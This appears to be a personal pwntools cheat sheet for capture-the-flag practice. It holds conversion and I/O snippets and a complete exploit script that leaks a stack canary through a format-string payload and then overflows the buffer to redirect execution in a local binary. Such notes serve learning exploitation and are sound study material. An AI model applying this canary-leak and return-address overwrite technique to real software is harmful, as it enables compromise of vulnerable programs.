hex_value = "4765656b73666f724765656b73"
byte_str = bytes.fromhex(hex_value)
result_str = byte_str.decode('utf-8')
byte_arr = str.encode("Foo")
x = int("deadbeef", 16)
x = int("0xdeadbeef", 0)
x = int("0xdeadbeef", 16)
- integer to binary/octal/hexadecimal
bin(23)
oct(31)
hex(26)
#!/usr/bin/python
import pwn
pty = pwn.process.PTY
proc = pwn.process("./a.out", stdin = pty, stdout = pty)
proc.recvuntil(b"lies at ")
addr = proc.recvline().decode("utf-8").strip()
# print("addr =", addr)
addr = int(addr, 16)
proc.recvline()
proc.recvline()
pad = b"-" * 11
buffer = b"a" * 32
format_string_payload = buffer + pad + b"%21$p"
proc.sendline(format_string_payload)
proc.recvline()
proc.sendline(b"2020")
proc.recvline()
proc.sendline(b"06")
proc.recvline()
proc.sendline(b"16")
proc.recvuntil(b"to " + pad)
canary = proc.recvline().decode("utf-8").strip()
# print("canary =", canary)
canary = int(canary, 16)
proc.recvuntil(b"you?")
buffer = b"a" * 32
format_string = b"b" * 16
padding = b"c" * 8
payload = buffer + format_string + padding + pwn.p64(canary) + padding + pwn.p64(addr)
proc.sendline(payload)
proc.recvline()
proc.recvline()
print("############################# PROGRAM OUTPUT #########################")
print(proc.recvline().decode("utf-8"))
print("######################################################################")
io = remote("new.domain.name", 80)
io = remote("12.12.12.12", 5000)
- receive xyz after connecting
io.recv(n) # nbytes
io.recvline() # till newline
io.recvuntil("string") #receive until the occurance of string
- send xyz after connecting
io.send(b'bytes')
io.sendline(b'bytes') # also sends a newline
- convert an integer to 32/64 byte address little-endian
pwn.p32(some_integer)
pwn.p64(some_integer)
- same as above, but big-endian, and signed
pwn.p64(some_int, endian="big", sign=True)